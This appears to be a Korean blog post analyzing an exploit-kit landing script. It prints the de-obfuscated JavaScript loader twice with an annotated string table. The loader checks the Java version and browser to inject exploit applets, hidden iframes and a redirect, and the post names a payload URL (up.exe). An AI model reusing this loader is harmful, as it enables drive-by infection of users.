3. 스크립트
초기 스크립트를 확인해보면 제가 마지막으로 본 이전 버전과는 다를 게 많이 없습니다.
하지만, 해당 코드를 1차적으로 디코딩을 하면 새로운 값과 기존과 다른 스크립트가 있는 것을 확인할 수 있습니다.

- 1차 디코딩 스크립트
1차적으로 디코딩된 스크립트의 경우 난독화된 데이터 부분과 디코딩을 위한 연산 부분으로 나눌 수 있으며, 최종적으로는 `t=utf8to16(nbencode(nbcode(t),JbWRn$q7))` 이 부분을 통해 난독화가 해제됩니다.

- 최종 스크립트
해제된 난독화 결과를 살펴보면, `_0x4b88`로 정의되어 있는 배열부터 시작합니다.
`_0x4b88`는 이후 코드가 사용하는 문자열(메서드 이름, HTML 조각, 애플릿 파라미터, 클래스명 등)을 한 배열에 모아 두고 인덱스로만 참조하게 만든 문자열 테이블로, Java 버전(deployJava.getJREs())과 브라우저(userAgent)에 따라 각 취약점 분기로 이어지도록 공격자가 구성해 놓은 것입니다.
[스크립트]
var _0x4b88=["","\x6C\x65\x6E\x67\x74\x68","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D","
\x2E\x68\x74\x6D\x6C\x20\x77\x69\x64\x74\x68\x3D\x33\x30\x20\x68
\x65\x69\x67\x68\x74\x3D\x31\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\
x3E","\x77\x72\x69\x74\x65\x6C\x6E","\x67\x65\x74\x4A\x52\x45\x73",
"\x72\x65\x70\x6C\x61\x63\x65","\x74\x6F\x4C\x6F\x77\x65\x72\x43
\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x2E\x6A\x61
\x7
[중략]
\61\x6F\x6D\x61\x6F\x6C\x76\x27\x3E\x3C\x70\x61\x72\x61\x6D\x20\x6E\x61\x6D\x65\x3D\x73\x69\x20\x76\x61\x6C\x75\x65\x3D\x27\x63\x6F1\x6D","\x6E\x61\x6D\x65","\x64\x6F\x74\x61","\x76\x61\x6C\x75\x65","
\x6E\x74\x20\x31\x30","\x65\x64\x67\x65","\x74\x72\x69\x64\x65\x6E\x
74","\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\
x3D\x27","\x2E\x68\x74\x6D\x6C\x27","\x6E\x74\x20\x36","\x6E\x74\x20
\x35"];function encode(){var _0x7c0dx2=ckl(),_0x7c0dx3=new Array,_0x7c0dx4=_0x4b88[0];for(var _0x7c0dx5=0;_0x7c0dx5< _0x7c0dx2[_0x4b88[1]];_0x7c0dx5++){if(_0x7c0dx2[_0x7c0dx5]==159){}else {_0x7c0dx3[_0x7c0dx5]= _0x7c0dx2[_0x7c0dx5]-159;_0x7c0dx4+= String[_0x4b88[2]](_0x7c0dx3[_0x7c0dx5])}};return _0x7c0dx4}function bu(){document[_0x4b88[5]](_0x4b88[3]+ bugatti+ _0x4b88[4])}function fe(){document[_0x4b88[5]](_0x4b88[3]+ ferrari+ _0x4b88[4])}function be(){document[_0x4b88[5]](_0x4b88[3]+ bentley+ _0x4b88[4])}var ckurl=encode();var wmck=deployJava[_0x4b88[6]]()+ _0x4b88[0];wmck= parseInt(wmck[_0x4b88[7]](/\.|\_/g,_0x4b88[0]));var WhatIE=navigator[_0x4b88[9]][_0x4b88[8]]();if(wmck> 17006&& wmck< 17011){var jaguarx=jaguar+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[13]+ ckurl+ _0x4b88[14]+ jaguarx+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[23];gondad[_0x4b88[24]]= _0x4b88[25];gondad[_0x4b88[26]]= jaguarx;gondad[_0x4b88[27]]= _0x4b88[28];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[32]);gondad[_0x4b88[30]](_0x4b88[33],_0x4b88[34]);gondad[_0x4b88[30]](_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck>= 17000&& wmck< 17007){var audix=audi+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[37]+ ckurl+ _0x4b88[38]+ audix+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[39];gondad[_0x4b88[24]]= _0x4b88[39];gondad[_0x4b88[26]]= audix;gondad[_0x4b88[27]]= _0x4b88[40];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[41]);gondad[_0x4b88[30]]
[중략]
(_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck<= 16027&& WhatIE[_0x4b88[12]](_0x4b88[42])== -1&& WhatIE[_0x4b88[12]](_0x4b88[43])== -1){var benzx=benz+ _0x4b88[10];var okokx=GTR+ _0x4b88[44];var ckckx=document[_0x4b88[19]](_0x4b88[21]);ckckx[_0x4b88[26]]= benzx;ckckx[_0x4b88[27]]= okokx;ckckx[_0x4b88[22]]= _0x4b88[45];ckckx[_0x4b88[24]]= _0x4b88[46];document[_0x4b88[18]][_0x4b88[20]](ckckx);var ckcks=document[_0x4b88[19]](_0x4b88[47]);ckcks[_0x4b88[48]]= _0x4b88[49];ckcks[_0x4b88[50]]= ckurl;ckckx[_0x4b88[20]](ckcks)}}};document[_0x4b88[5]](_0x4b88[3]+ maserati+ _0x4b88[4]);if(WhatIE[_0x4b88[12]](_0x4b88[51])> -1&& WhatIE[_0x4b88[12]](_0x4b88[52])> -1){be();}else {if(WhatIE[_0x4b88[12]](_0x4b88[53])> -1&& WhatIE[_0x4b88[12]](_0x4b88[43])> -1){setTimeout(_0x4b88[54]+ bugatti+ _0x4b88[55],5000)}else {if(WhatIE[_0x4b88[12]](_0x4b88[56])> -1){bu();}else {if(WhatIE[_0x4b88[12]](_0x4b88[57])> -1){fe();}}}}
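// String table for the de-obfuscated loader. Every method name, HTML fragment,
// applet parameter and class name the script needs is fetched as _0x4b88[i], so
// none of it appears in clear text in the code body. The captured listing had
// several literals broken across lines by line-wrapping (a syntax error as-is);
// they are rejoined here, one entry per line with its index, matching the
// hex-escaped copy of the same table (e.g. "\x6E\x74\x20\x31\x30" = "nt 10").
// The branch logic after the table uses these indices: the Java version from
// deployJava.getJREs() selects the jar/class, userAgent selects IE-specific
// markup and the trailing iframe/redirect.
var _0x4b88 = [
  "",                                   // 0  appended to getJREs() to coerce it to a string
  "length",                             // 1
  "fromCharCode",                       // 2  String.fromCharCode in encode()
  "<iframe src=",                       // 3  3 + <name> + 4: iframe to bugatti/ferrari/bentley/maserati
  ".html width=30 height=1></iframe>",  // 4
  "writeln",                            // 5  document.writeln
  "getJREs",                            // 6  deployJava.getJREs()
  "replace",                            // 7  strips "." and "_" from the JRE version ("1.7.0_07" -> 17007)
  "toLowerCase",                        // 8
  "userAgent",                          // 9  navigator.userAgent
  ".jar",                               // 10 suffix for jaguar / audi / benz
  "msie 6",                             // 11 UA check: IE6 gets the <object> markup below instead of <applet>
  "indexOf",                            // 12
  // 13-15: <object> wrapper for the jaguar jar (Java 1.7.0_07-1.7.0_10 branch);
  // the `xiaomaolv` param carries ckurl, `archive` carries the jar name.
  "<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='600' height='400'><param name=xiaomaolv value='",
  "'><param name=bn value='woyouyizhixiaomaol'><param name=si value='conglaiyebuqi'><param name=bs value='748'><param name=CODE value='xml20130422.XML20130422.class'><param name=archive value='",
  "'></object>",
  "<br>",                               // 16 document.write("<br>") before the applet is created
  "write",                              // 17 document.write
  "body",                               // 18
  "createElement",                      // 19
  "appendChild",                        // 20
  "applet",                             // 21 non-IE6 path builds an <applet> element instead of <object>
  "width",                              // 22
  "600",                                // 23
  "height",                             // 24
  "400",                                // 25
  "archive",                            // 26 applet.archive = jaguar + ".jar"
  "code",                               // 27
  "xml20130422.XML20130422.class",      // 28 applet.code for the jaguar branch
  "xiaomaolv",                          // 29 setAttribute("xiaomaolv", ckurl)
  "setAttribute",                       // 30
  "bn",                                 // 31
  "woyouyizhixiaomaol",                 // 32 note: no trailing "v", unlike index 41
  "si",                                 // 33
  "conglaiyebuqi",                      // 34
  "bs",                                 // 35
  "748",                                // 36
  // 37-38: <object> wrapper for the audi jar (Java 1.7.0_00-1.7.0_06 branch),
  // closed with index 15. The capture broke the line after height='256'>;
  // rejoined without a space, as in index 13 -- verify against the hex form.
  "<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='256' height='256'><param name=xiaomaolv value='",
  "'><param name=bn value='woyouyizhixiaomaolv'><param name=si value='conglaiyebuqi'><param name=bs value='748'><param name=CODE value='setup.hohoho.class'><param name=archive value='",
  "256",                                // 39 applet width/height for the audi branch
  "setup.hohoho.class",                 // 40 applet.code for the audi branch
  "woyouyizhixiaomaolv",                // 41
  "msie 10",                            // 42 excluded from the Java <= 1.6.0_27 branch
  "rv:11",                              // 43 excluded there too; with "trident" selects the delayed redirect
  ".class",                             // 44 suffix for GTR -> applet.code in the benz branch
  "30",                                 // 45 benz applet width
  "1",                                  // 46 benz applet height
  "param",                              // 47 <param name="dota" value=ckurl> appended to the benz applet
  "name",                               // 48
  "dota",                               // 49
  "value",                              // 50
  "nt 10",                              // 51 "nt 10" && "edge" -> be()
  "edge",                               // 52
  "trident",                            // 53 "trident" && "rv:11" -> setTimeout(54 + bugatti + 55, 5000)
  "window.location='",                  // 54 string passed to setTimeout (evaluated as code): redirect after 5 s
  ".html'",                             // 55
  "nt 6",                               // 56 -> bu()
  "nt 5",                               // 57 -> fe()
];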
function encode(){var _0x7c0dx2=ckl(),_0x7c0dx3=new Array,_0x7c0dx4=_0x4b88[0];for(var _0x7c0dx5=0;_0x7c0dx5< _0x7c0dx2[_0x4b88[1]];_0x7c0dx5++){if(_0x7c0dx2[_0x7c0dx5]==159){}else {_0x7c0dx3[_0x7c0dx5]= _0x7c0dx2[_0x7c0dx5]-159;_0x7c0dx4+= String[_0x4b88[2]](_0x7c0dx3[_0x7c0dx5])}};return _0x7c0dx4}function bu(){document[_0x4b88[5]](_0x4b88[3]+ bugatti+ _0x4b88[4])}function fe(){document[_0x4b88[5]](_0x4b88[3]+ ferrari+ _0x4b88[4])}function be(){document[_0x4b88[5]](_0x4b88[3]+ bentley+ _0x4b88[4])}var ckurl=encode();var wmck=deployJava[_0x4b88[6]]()+ _0x4b88[0];wmck= parseInt(wmck[_0x4b88[7]](/\.|\_/g,_0x4b88[0]));var WhatIE=navigator[_0x4b88[9]][_0x4b88[8]]();if(wmck> 17006&& wmck< 17011){var jaguarx=jaguar+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[13]+ ckurl+ _0x4b88[14]+ jaguarx+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[23];gondad[_0x4b88[24]]= _0x4b88[25];gondad[_0x4b88[26]]= jaguarx;gondad[_0x4b88[27]]= _0x4b88[28];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[32]);gondad[_0x4b88[30]](_0x4b88[33],_0x4b88[34]);gondad[_0x4b88[30]](_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck>= 17000&& wmck< 17007){var audix=audi+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[37]+ ckurl+ _0x4b88[38]+ audix+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var
[중략]
(_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck<= 16027&& WhatIE[_0x4b88[12]](_0x4b88[42])== -1&& WhatIE[_0x4b88[12]](_0x4b88[43])== -1){var benzx=benz+ _0x4b88[10];var okokx=GTR+ _0x4b88[44];var ckckx=document[_0x4b88[19]](_0x4b88[21]);ckckx[_0x4b88[26]]= benzx;ckckx[_0x4b88[27]]= okokx;ckckx[_0x4b88[22]]= _0x4b88[45];ckckx[_0x4b88[24]]= _0x4b88[46];document[_0x4b88[18]][_0x4b88[20]](ckckx);var ckcks=document[_0x4b88[19]](_0x4b88[47]);ckcks[_0x4b88[48]]= _0x4b88[49];ckcks[_0x4b88[50]]= ckurl;ckckx[_0x4b88[20]](ckcks)}}};document[_0x4b88[5]](_0x4b88[3]+ maserati+ _0x4b88[4]);if(WhatIE[_0x4b88[12]](_0x4b88[51])> -1&& WhatIE[_0x4b88[12]](_0x4b88[52])> -1){be();}else {if(WhatIE[_0x4b88[12]](_0x4b88[53])> -1&& WhatIE[_0x4b88[12]](_0x4b88[43])> -1){setTimeout(_0x4b88[54]+ bugatti+ _0x4b88[55],5000)}else {if(WhatIE[_0x4b88[12]](_0x4b88[56])> -1){bu();}else {if(WhatIE[_0x4b88[12]](_0x4b88[57])> -1){fe();}}}}
var _0x4b88에 정의된 내용
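// String table for the de-obfuscated loader. Every method name, HTML fragment,
// applet parameter and class name the script needs is fetched as _0x4b88[i], so
// none of it appears in clear text in the code body. The captured listing had
// several literals broken across lines by line-wrapping (a syntax error as-is);
// they are rejoined here, one entry per line with its index, matching the
// hex-escaped copy of the same table (e.g. "\x6E\x74\x20\x31\x30" = "nt 10").
// The branch logic in the script uses these indices: the Java version from
// deployJava.getJREs() selects the jar/class, userAgent selects IE-specific
// markup and the trailing iframe/redirect.
var _0x4b88 = [
  "",                                   // 0  appended to getJREs() to coerce it to a string
  "length",                             // 1
  "fromCharCode",                       // 2  String.fromCharCode in encode()
  "<iframe src=",                       // 3  3 + <name> + 4: iframe to bugatti/ferrari/bentley/maserati
  ".html width=30 height=1></iframe>",  // 4
  "writeln",                            // 5  document.writeln
  "getJREs",                            // 6  deployJava.getJREs()
  "replace",                            // 7  strips "." and "_" from the JRE version ("1.7.0_07" -> 17007)
  "toLowerCase",                        // 8
  "userAgent",                          // 9  navigator.userAgent
  ".jar",                               // 10 suffix for jaguar / audi / benz
  "msie 6",                             // 11 UA check: IE6 gets the <object> markup below instead of <applet>
  "indexOf",                            // 12
  // 13-15: <object> wrapper for the jaguar jar (Java 1.7.0_07-1.7.0_10 branch);
  // the `xiaomaolv` param carries ckurl, `archive` carries the jar name.
  "<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='600' height='400'><param name=xiaomaolv value='",
  "'><param name=bn value='woyouyizhixiaomaol'><param name=si value='conglaiyebuqi'><param name=bs value='748'><param name=CODE value='xml20130422.XML20130422.class'><param name=archive value='",
  "'></object>",
  "<br>",                               // 16 document.write("<br>") before the applet is created
  "write",                              // 17 document.write
  "body",                               // 18
  "createElement",                      // 19
  "appendChild",                        // 20
  "applet",                             // 21 non-IE6 path builds an <applet> element instead of <object>
  "width",                              // 22
  "600",                                // 23
  "height",                             // 24
  "400",                                // 25
  "archive",                            // 26 applet.archive = jaguar + ".jar"
  "code",                               // 27
  "xml20130422.XML20130422.class",      // 28 applet.code for the jaguar branch
  "xiaomaolv",                          // 29 setAttribute("xiaomaolv", ckurl)
  "setAttribute",                       // 30
  "bn",                                 // 31
  "woyouyizhixiaomaol",                 // 32 note: no trailing "v", unlike index 41
  "si",                                 // 33
  "conglaiyebuqi",                      // 34
  "bs",                                 // 35
  "748",                                // 36
  // 37-38: <object> wrapper for the audi jar (Java 1.7.0_00-1.7.0_06 branch),
  // closed with index 15. The capture broke the line after height='256'>;
  // rejoined without a space, as in index 13 -- verify against the hex form.
  "<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='256' height='256'><param name=xiaomaolv value='",
  "'><param name=bn value='woyouyizhixiaomaolv'><param name=si value='conglaiyebuqi'><param name=bs value='748'><param name=CODE value='setup.hohoho.class'><param name=archive value='",
  "256",                                // 39 applet width/height for the audi branch
  "setup.hohoho.class",                 // 40 applet.code for the audi branch
  "woyouyizhixiaomaolv",                // 41
  "msie 10",                            // 42 excluded from the Java <= 1.6.0_27 branch
  "rv:11",                              // 43 excluded there too; with "trident" selects the delayed redirect
  ".class",                             // 44 suffix for GTR -> applet.code in the benz branch
  "30",                                 // 45 benz applet width
  "1",                                  // 46 benz applet height
  "param",                              // 47 <param name="dota" value=ckurl> appended to the benz applet
  "name",                               // 48
  "dota",                               // 49
  "value",                              // 50
  "nt 10",                              // 51 "nt 10" && "edge" -> be()
  "edge",                               // 52
  "trident",                            // 53 "trident" && "rv:11" -> setTimeout(54 + bugatti + 55, 5000)
  "window.location='",                  // 54 string passed to setTimeout (evaluated as code): redirect after 5 s
  ".html'",                             // 55
  "nt 6",                               // 56 -> bu()
  "nt 5",                               // 57 -> fe()
];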
마지막으로 취약점으로 연결할 때에는 `var jaguarx=jaguar+_0x4b88[10]`(즉 jaguar + ".jar")와 같이 정의되어 있는 것을 볼 수 있는데, jaguar 변수 자체는 초기 스크립트 내에서 정의되어 있으므로 그쪽을 확인하시면 됩니다. 참고로 분기 조건은 deployJava.getJREs()에서 "."과 "_"를 제거해 얻은 Java 버전 숫자(wmck)와 userAgent이며, 1.7.0_07~1.7.0_10이면 jaguar.jar(xml20130422.XML20130422.class), 1.7.0_00~1.7.0_06이면 audi.jar(setup.hohoho.class), 1.6.0_27 이하(단 userAgent에 "msie 10"/"rv:11"이 없는 경우)이면 benz.jar(GTR + ".class") 애플릿이 삽입되고, 세 경우 모두 encode()로 복원한 ckurl이 애플릿 파라미터(xiaomaolv 또는 dota)로 전달됩니다.
참고로, jaguar = RhRdQk 입니다.
또한, exe 파일 같은 경우에도 초기에 복잡하게 되어 있는 것처럼 보이지만 기존과 별로 차이가 없습니다.
---------------------------
웹 페이지 메시지
---------------------------
hxxp://leeve[.]co[.]kr/apps/up.exe
---------------------------
확인
---------------------------
취약점 같은 경우에는 세부적으로 보지는 않았지만, 거의 비슷한 것 같아서 추후 포스팅을 하겠습니다.
몇년만에 쓰니까 잘 안써지지만, 꾸준히 포스팅을 하겠습니다.
마지막으로 심심할때마다 뭔가를 던져주는 창훈이에게 고맙다는 말을 전합니다!
감사합니다~